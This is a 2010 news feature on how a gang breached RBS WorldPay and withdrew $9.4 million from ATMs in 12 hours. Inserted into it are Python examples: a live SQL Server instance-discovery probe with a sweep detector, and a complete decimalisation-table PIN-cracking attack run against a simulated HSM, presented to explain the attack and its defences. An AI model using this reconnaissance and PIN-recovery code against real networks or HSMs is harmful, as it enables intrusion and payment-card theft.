Jan 25, 2010

How a gang stole $9.4 million from 280 ATMs in 12 hours

The top line from the RBS WorldPay caper reads like a trailer for George Clooney’s next Ocean’s 11 summer blockbuster: An elite Euro-Russian cybergang uses the Internet to remotely crack deep inside the network of a giant U.S. debit- and credit-card processor. The gang swipes and decrypts valuable debit-card account data; and then sets into motion a globe-spanning, multi-million dollar score.
Moving fast to avoid detection, an army of accomplices carrying blank payment cards encoded with stolen debit account numbers hit 2,100 ATMs in 280 cities in eight countries, in just 12 hours. Total take: a cool $9.4 million.
See related commentary: Why cybercrime is here to stay
In Hollywood, the ring leaders would smugly disband. Not this time, though. The bad guys got caught, thanks to unprecedented collaboration of U.S. and Estonian police, whose leaders bridged a geopolitical/cultural chasm to save the day — but that’s another movie.
What follows is a blow-by-blow account of the RBS WorldPay caper, based on security experts' extrapolations from details revealed in the Nov. 10, 2009 indictment of Viktor Pleshchuk, 28, of St. Petersburg, Russia; Sergei Tsurikov, 25, of Tallinn, Estonia; Oleg Covelin, 28, of Chisinau, Moldova; and a co-defendant identified only as "Hacker 3."
They and four others were charged with wire fraud, computer fraud and identity theft, as outlined in this indictment and this FBI press release.
The easy part: initial breach
Pleshchuk, Tsurikov and Covelin gained "unauthorized access" into RBS WorldPay, the Atlanta, GA-based payment processing division of the Royal Bank of Scotland Group. But authorities don't spell out precisely how they did this.
They certainly did not piggyback onto RBS's WiFi systems, as hacker Albert Gonzalez did to initially penetrate retailer TJX's internal network and steal 94 million payment card transaction records. RBS doesn't use WiFi as a convenience tool that can be hacked by anyone with a cheap antenna, as many giant retail chains do.
According to the indictment, Oleg Covelin, based in Moldova, "learned of the vulnerability in the RBS WorldPay computer network" and provided that intelligence to Tsurikov in Estonia.
This is the second indictment of Covelin in three months. In September, he was one of five eastern European men indicted in New York as part of an international ID theft ring known as the Western Express Cybercrime Group.
Covelin and Tsurikov recruited the Russian hacker Pleshchuk and the mysterious Hacker 3 to figure out how best to exploit the security hole. They very well may have used a SQL injection attack on one of RBS's public-facing Web pages. This is a tried-and-true attack vector, used in the infamous Heartland Payment Systems breach.
Or they could have exploited a security hole in one of RBS's mail servers or Web servers that was not current on all of its security patches, says Chris Wysopal, CTO of application security firm Veracode.
This was the easy part. "Breaching a perimeter is pretty well understood," says Wysopal.
Scanning for jackpot servers
Once the intruders got inside RBS's internal network on Nov. 4, 2008, they immediately began looking for jackpot servers. This is fairly simple to do, as well. They probably used Nmap, or some other free port-scanning tool, to quickly locate every server hosting a Microsoft SQL Server database.
Locating, accessing and extracting data from SQL databases from inside the "soft, chewy center of corporate networks" is fairly trivial stuff, says Don Jackson, senior researcher at SecureWorks.
Wysopal surmises that the bad guys took their sweet time combing through the harvested data, sorting perhaps millions of credit and debit card account numbers. This would seem to suggest that RBS's intrusion detection systems failed to send up any red flags as a result of the perimeter breach or the internal SQL database breaches. Or if they did, RBS ignored them.
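To make the two preceding steps concrete, here is an added example (not code from the article or from anyone it quotes) of what a scanner does when it "locates SQL Server databases", and of the detection that would have caught it. A single UDP datagram to port 1434 makes the SQL Server Browser service enumerate every instance on a host, which is exactly the probe behind Nmap's ms-sql scripts; the parser below decodes that reply, and the sweep detector flags any internal source that touches many distinct hosts on the SQL Server port inside a short window. The SSRP reply bytes and the flow records are constructed for the example; the host names, addresses and thresholds are assumptions, not details from the RBS case.

```python
import socket
from collections import defaultdict
from datetime import datetime, timedelta

# --- 1. Finding SQL Server instances: SQL Server Resolution Protocol (SSRP) ---
SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x02"   # "enumerate all instances on this host" request
SVR_RESP = 0x05           # first byte of a valid SSRP reply


def parse_ssrp_response(datagram: bytes) -> list:
    """Decode an SSRP SVR_RESP datagram into one dict per SQL Server instance.

    Layout: 0x05, 2-byte little-endian body length, then a ';'-separated
    key;value string per instance, instances terminated by ';;'.
    """
    if len(datagram) < 3 or datagram[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP datagram")
    length = int.from_bytes(datagram[1:3], "little")
    body = datagram[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for chunk in body.split(";;"):
        fields = chunk.strip(";").split(";")
        if len(fields) < 2:
            continue
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def discover_instances(host: str, timeout: float = 2.0) -> list:
    """Live probe: ask host:1434/udp for its instances (empty list if silent)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_ssrp_response(data)


# Constructed reply, as a Browser service would send for a host with a default
# instance on 1433 and a second named instance on a dynamic port.
_SAMPLE_BODY = (
    b"ServerName;SQL01;InstanceName;MSSQLSERVER;IsClustered;No;Version;10.0.1600.22;tcp;1433;;"
    b"ServerName;SQL01;InstanceName;PAYROLL;IsClustered;No;Version;9.00.5000.00;tcp;49172;;"
)
SAMPLE_DATAGRAM = bytes([SVR_RESP]) + len(_SAMPLE_BODY).to_bytes(2, "little") + _SAMPLE_BODY


# --- 2. Catching the sweep: distinct SQL Server hosts per source in a window ---
# Constructed flow records (timestamp src dst dport proto), not RBS logs: one
# internal host walks port 1433 across a /24 in seconds, while an application
# server talks to a single SQL Server all evening.
SAMPLE_FLOWS = (
    [f"2008-11-04T22:15:{i:02d} 10.20.5.17 10.20.8.{i} 1433 tcp" for i in range(1, 13)]
    + [f"2008-11-04T22:{m:02d}:00 10.20.9.5 10.20.8.10 1433 tcp" for m in range(0, 60, 5)]
    + ["2008-11-04T22:16:30 10.20.5.17 10.20.8.40 445 tcp"]
)


def parse_flow(line: str):
    ts, src, dst, dport, proto = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), proto


def find_port_sweeps(lines, port=1433, window=timedelta(minutes=5), min_hosts=10) -> dict:
    """Return {src: peak distinct destinations} for every source that reaches
    at least min_hosts different hosts on `port` within any sliding `window`."""
    by_src = defaultdict(list)
    for line in lines:
        ts, src, dst, dport, proto = parse_flow(line)
        if dport == port and proto == "tcp":
            by_src[src].append((ts, dst))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        lo = 0
        for hi, (ts, _) in enumerate(events):
            while ts - events[lo][0] > window:
                lo += 1                      # slide the window's left edge
            reached = {dst for _, dst in events[lo:hi + 1]}
            if len(reached) >= min_hosts:
                alerts[src] = max(alerts.get(src, 0), len(reached))
    return alerts


if __name__ == "__main__":
    for inst in parse_ssrp_response(SAMPLE_DATAGRAM):
        print(inst.get("InstanceName"), "on tcp port", inst.get("tcp"))
    print("sweeps:", find_port_sweeps(SAMPLE_FLOWS))
```

The point of the second half is the caveat the article raises: a source that opens 1433 on a dozen hosts in twelve seconds is not a pattern any application server produces, so a NetFlow- or firewall-log rule with a distinct-destination threshold catches the reconnaissance phase well before any data leaves.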
At some point, the ring leaders stumbled upon 44 prepaid payroll debit accounts, 42 of them issued by Palm Desert National Bank. Companies use such accounts to pay their workers: each worker gets a debit card to withdraw pay at ATMs, and the company deposits salaries at bi-weekly or monthly intervals.
"I don't think they were targeting any particular accounts," says Wysopal. "These tend to be crimes of opportunity. They may have been probing all kinds of banking networks, found a way into this one, took a look around at vulnerable systems, found this ATM data, and went down this road."
Finding and cracking PIN blocks
The thieves also needed PINs to make the ATM withdrawals. Elite cyber gangs know that payment processors typically keep PIN operations on a separate device called a hardware security module, or HSM, which holds the keys and returns PINs only in encrypted form. The same port-scanning tool, such as Nmap, used to locate SQL databases holding account numbers can be easily tweaked to seek out the HSM servers handling PINs, says Wysopal.
"They knew enough there would be a specialized machine, where the PINs would be stored," says Wysopal. "They knew the PINs would be encrypted and that they'd have to do some research to learn how it worked, and how to decrypt it."
PIN-cracking research isn't nearly as widely circulated as the how-to material on spamming, phishing and SQL injection. But it is out there on the Internet, as a paper titled The Unbearable Lightness of PIN Cracking, by Omer Berkman and Odelia Mosheh Ostrovsky, presented at the Financial Cryptography and Data Security 2007 conference, attests.
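The paper cited above belongs to a line of work on attacking the HSM's PIN-verification API rather than its keys. The clearest member of that family, and the one worth seeing worked through, is the decimalisation-table attack (Bond and Zielinski, 2003): an IBM 3624-style verify call lets the caller supply the decimalisation table and the offset, and answers only pass or fail, yet a few dozen calls recover a four-digit PIN. The code below is an added example, not code from the article, the indictment, or any vendor; the HSM is a toy model that uses HMAC-SHA256 where a real device uses DES under the PIN derivation key and accepts the trial PIN in clear where a real API takes an encrypted PIN block. The key, PAN and PIN are constructed values.

```python
import hashlib
import hmac
import itertools

# IBM 3624 decimalisation table: each hex nibble of the keyed validation data
# is mapped through this string to produce one decimal digit of the natural PIN.
STD_DECTAB = "0123456789012345"
PIN_LEN = 4


class Hsm3624Sim:
    """Toy stand-in for an HSM's IBM-3624 PIN verification API (constructed
    for this example). What the attack needs is exactly what real APIs also
    expose: the caller chooses the decimalisation table and the offset and
    gets back a pass/fail answer, while the key never leaves the device."""

    def __init__(self, pin_derivation_key: bytes):
        self._pdk = pin_derivation_key
        self.calls = 0

    def _natural_pin(self, pan: str, dectab: str) -> str:
        # HMAC-SHA256 stands in for DES under the PIN derivation key.
        digest = hmac.new(self._pdk, pan.encode(), hashlib.sha256).hexdigest()
        return "".join(dectab[int(h, 16)] for h in digest[:PIN_LEN])

    def verify(self, pan: str, dectab: str, offset: str, trial_pin: str) -> bool:
        """PIN_ok iff trial_pin == (natural PIN + offset), digit-wise mod 10."""
        self.calls += 1
        natural = self._natural_pin(pan, dectab)
        expected = "".join(str((int(n) + int(o)) % 10) for n, o in zip(natural, offset))
        return expected == trial_pin

    def issue(self, pan: str, customer_pin: str) -> str:
        """Issuer side: the offset stored next to the account so that the
        customer's chosen PIN verifies under the standard table."""
        natural = self._natural_pin(pan, STD_DECTAB)
        return "".join(str((int(c) - int(n)) % 10) for c, n in zip(customer_pin, natural))


def mask_table(digit: int) -> str:
    """Table mapping nibbles that normally decimalise to `digit` -> 1, others -> 0."""
    return "".join("1" if STD_DECTAB[i] == str(digit) else "0" for i in range(16))


def crack_pin(hsm: Hsm3624Sim, pan: str, offset: str) -> str:
    """Decimalisation-table attack against the verify oracle.

    Phase 1 (10 calls): with offset 0000 and trial PIN 0000, the mask table
    for digit d makes verify fail exactly when d occurs in the natural PIN.
    Phase 2: for each digit found, try 0/1 trial PINs until the one marking
    its positions passes. Adding the (stored, attacker-readable) offset to
    the recovered natural PIN gives the customer's real PIN.
    """
    zero = "0" * PIN_LEN
    present = [d for d in range(10) if not hsm.verify(pan, mask_table(d), zero, zero)]
    digits = [""] * PIN_LEN
    unknown = list(range(PIN_LEN))
    for d in present[:-1]:
        tab = mask_table(d)
        placed = False
        for r in range(1, len(unknown) + 1):
            for subset in itertools.combinations(unknown, r):
                trial = "".join("1" if i in subset else "0" for i in range(PIN_LEN))
                if hsm.verify(pan, tab, zero, trial):
                    for i in subset:
                        digits[i] = str(d)
                    unknown = [i for i in unknown if i not in subset]
                    placed = True
                    break
            if placed:
                break
    for i in unknown:                  # every position left belongs to the last digit
        digits[i] = str(present[-1])
    natural = "".join(digits)
    return "".join(str((int(n) + int(o)) % 10) for n, o in zip(natural, offset))


if __name__ == "__main__":
    hsm = Hsm3624Sim(b"demo-pin-derivation-key")     # constructed key
    pan, customer_pin = "4000123412341234", "7391"   # constructed account
    offset = hsm.issue(pan, customer_pin)            # what the bank's database holds
    print("recovered", crack_pin(hsm, pan, offset), "in", hsm.calls, "API calls")
```

Two things follow from running it. The attacker never touches the key, so "decrypting the PINs" in a case like this is usually a matter of reaching a host that is allowed to call the HSM and reading the offsets from the same database that held the account numbers. And the defence is on the API side, not the cipher: an HSM that accepts only a fixed, signed decimalisation table, rate-limits failed verifications per PAN, and logs every verify call from an unexpected host takes this attack off the table.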
The members of this cyber gang appear to be brilliant at multi-tasking. While they were working to find and decrypt the needed PINs, they also manipulated the SQL databases holding the account information, raising the limits for ATM withdrawals. "It is not clear how the attackers accessed the SQL server, whether it was a command-line on the server itself, another machine, or perhaps through SQL Injection," says Wysopal.
Meanwhile, they also readied 44 counterfeit debit cards, each carrying a stolen payroll account number on its magnetic stripe, and organized a global network of "cashers" to use the 44 cards at 2,100 ATMs in 280 cities in the United States, Russia, Ukraine, Estonia, Italy, Hong Kong, Japan and Canada.
All of this, the 44 faked cards with account numbers and PINs and the global network of cashers, was in place, tested and ready to go by Nov. 8. The gang even prepared code to access RBS's network to monitor the planned withdrawals in real time, and, afterward, destroy data to try to erase their tracks from the system, according to the indictment.
Wave of thievery
The climactic cashout went like clockwork. For 12 hours, the cashers hit ATM after ATM, extracting $9.4 million. And then the operation shut down. The indictment gives a few snapshots of this globe-spanning wave of thievery.
Hacker 3 was responsible for managing the network of 44 cashers. Each would get to keep 30% to 50% of the stolen funds, transferring the balance to Hacker 3, who was in charge of distributing shares to the other ring leaders.
The withdrawals, as directed by Hacker 3, followed a strictly coordinated time schedule; Pleshchuk and Tsurikov monitored the ATMs dishing out cash in real time from inside RBS's network.
Tsurikov also managed a team of four cashers who hit ATMs in his home country, Estonia. They pulled out $289,000. Estonian police, working closely with the FBI, arrested the entire band. Information from the Estonian arrests led to the identification and arrest of a pair of cashers in Hong Kong.
Uri Rivner, Head of New Technologies, Identity Protection & Verification at RSA, The Security Division of EMC, says the gang's technical prowess was unremarkable. "The technical aspects in this case were not that impressive," says Rivner. "But the level of coordination was staggering."
Rivner says Pleshchuk, Tsurikov, Covelin and Hacker 3 likely spent months on private chat channels and Internet forums plotting and recruiting accomplices.
"They cloned 44 cards and gave them to an army of cashers, that went from ATM to ATM in their local cities," says Rivner. "So, on average, each cloned card was used in 47 ATMs in six adjacent towns. Managing time zone issues and coordinating cashers in eight nations, all required to hit as many ATMs as possible within 12 hours, makes me think of an al-Qaeda-like strategy of multiple attacks in a single day."
“A lot of planning and a very high degree of international cooperation went into this scam.”
